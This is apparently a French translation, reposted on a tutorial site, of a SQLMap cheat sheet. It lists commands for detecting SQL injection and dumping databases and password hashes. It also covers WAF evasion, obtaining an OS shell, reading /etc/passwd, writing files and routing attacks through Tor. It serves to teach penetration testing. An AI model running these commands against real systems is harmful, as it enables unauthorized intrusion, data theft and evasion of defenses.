Maison > développement back-end > Tutoriel Python > Aide-mémoire SQLMap : un guide rapide pour l'injection SQL automatisée

Aide-mémoire SQLMap : un guide rapide pour l'injection SQL automatisée

Linda Hamilton
Libérer: 2024-09-26 15:30:02
original
975 Les gens l'ont consulté

SQLMap Cheat Sheet: A Quick Guide for Automated SQL Injection

Auteur : Trix Cyrus

Qu'est-ce que SQLMap ?
SQLMap est un outil de test d'intrusion open source utilisé pour détecter et exploiter les vulnérabilités d'injection SQL dans les applications Web. Il prend en charge divers systèmes de bases de données tels que MySQL, PostgreSQL, Oracle, Microsoft SQL Server, etc.

Utilisation de base
Pour démarrer avec SQLMap, vous pouvez l'exécuter dans sa forme la plus simple en fournissant l'URL cible :

sqlmap -u "http://example.com/index.php?id=1"
Copier après la connexion

Cette commande analyse l'URL cible à la recherche de vulnérabilités d'injection SQL.

1. Détection des vulnérabilités
Utilisez les options suivantes pour effectuer une analyse de vulnérabilité de base et détecter automatiquement les points d'injection SQL :

sqlmap -u "http://example.com/index.php?id=1" --dbs
Copier après la connexion
Copier après la connexion

--dbs : répertorie toutes les bases de données disponibles sur le serveur cible si une vulnérabilité est trouvée.

2. Spécification des requêtes POST

Pour les cibles qui nécessitent une requête POST (généralement dans les formulaires de connexion), vous pouvez spécifier les données comme ceci :

sqlmap -u "http://example.com/login.php" --data="username=admin&password=1234"
Copier après la connexion

3. Contourner les WAF et les filtres

Pour échapper aux pare-feu d'applications Web (WAF), SQLMap inclut des techniques d'obscurcissement de la charge utile :

sqlmap -u "http://example.com/index.php?id=1" --tamper=space2comment
Copier après la connexion

--tamper : utilise des scripts de falsification pour échapper aux filtres. Exemple : space2comment, charencode.

4. Extraction de bases de données, de tables et de colonnes
Pour obtenir une liste des bases de données sur le système cible :

sqlmap -u "http://example.com/index.php?id=1" --dbs
Copier après la connexion
Copier après la connexion

Une fois une base de données identifiée, extrayez ses tables :

sqlmap -u "http://example.com/index.php?id=1" -D database_name --tables
Copier après la connexion

Pour obtenir les colonnes d'une table spécifique :

sqlmap -u "http://example.com/index.php?id=1" -D database_name -T table_name --columns
Copier après la connexion

5. Données de dumping

Le dumping du contenu d'une table est l'une des fonctionnalités les plus utiles de SQLMap. Par exemple, pour vider toutes les données d'une table spécifique :

sqlmap -u "http://example.com/index.php?id=1" -D database_name -T table_name --dump
Copier après la connexion

6. Énumération des utilisateurs et des mots de passe de la base de données

SQLMap peut également être utilisé pour énumérer les utilisateurs de bases de données et même déchiffrer des mots de passe hachés :

sqlmap -u "http://example.com/index.php?id=1" --users
sqlmap -u "http://example.com/index.php?id=1" --passwords
Copier après la connexion

7. Accéder au système d'exploitation

Dans certains cas, SQLMap peut être utilisé pour exécuter des commandes sur le système d'exploitation, notamment lorsque l'utilisateur de la base de données dispose de privilèges de haut niveau :

sqlmap -u "http://example.com/index.php?id=1" --os-shell
Copier après la connexion

Cela fournira un shell interactif où vous pourrez exécuter des commandes sur le système cible.

8. Téléchargement et lecture de fichiers

Vous pouvez également lire des fichiers du système cible ou télécharger des fichiers malveillants (si autorisé) :

sqlmap -u "http://example.com/index.php?id=1" --file-read="/etc/passwd"
sqlmap -u "http://example.com/index.php?id=1" --file-write="/path/to/file" --file-dest="/destination/path"
Copier après la connexion

9. Utiliser Tor pour l'anonymat

Pour masquer votre identité, vous pouvez exécuter SQLMap via le réseau Tor :

sqlmap -u "http://example.com/index.php?id=1" --tor --tor-type=SOCKS5 --check-tor
Copier après la connexion

--tor : active Tor.
--check-tor : Vérifie si la connexion est établie via Tor.

10. Sauvegarde et reprise des sessions

SQLMap vous permet de sauvegarder et de reprendre votre progression en utilisant l'option --session :

sqlmap -u "http://example.com/index.php?id=1" --session=your_session_name
Copier après la connexion

Plus tard, vous pourrez reprendre la même séance en :

sqlmap -r your_session_name
Copier après la connexion

11. Mode verbeux

Pour voir des informations détaillées sur ce que fait SQLMap :

sqlmap -u "http://example.com/index.php?id=1" -v 3
Copier après la connexion

L'option -v contrôle la verbosité (niveaux de 0 à 6, où 6 affiche tous les détails).

  1. Analyses automatisées pour plusieurs cibles

SQLMap prend en charge l'analyse de plusieurs URL stockées dans un fichier :

sqlmap -m urls.txt --batch
Copier après la connexion

--batch : répondez automatiquement à toutes les invites avec les options par défaut, utiles pour l'analyse automatisée.

utilisez également --risk=3 et --level=5 pour faire avancer l'analyse
Vous pouvez utiliser cette aide-mémoire pour présenter aux lecteurs les commandes essentielles de SQLMap et les aider à démarrer avec les tests d'injection SQL.

~TrixSec

Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!

source:dev.to
Déclaration de ce site Web
Le contenu de cet article est volontairement contribué par les internautes et les droits d'auteur appartiennent à l'auteur original. Ce site n'assume aucune responsabilité légale correspondante. Si vous trouvez un contenu suspecté de plagiat ou de contrefaçon, veuillez contacter admin@php.cn
Derniers articles par auteur
Tutoriels populaires
Plus>
Derniers téléchargements
Plus>
effets Web
Code source du site Web
Matériel du site Web
Modèle frontal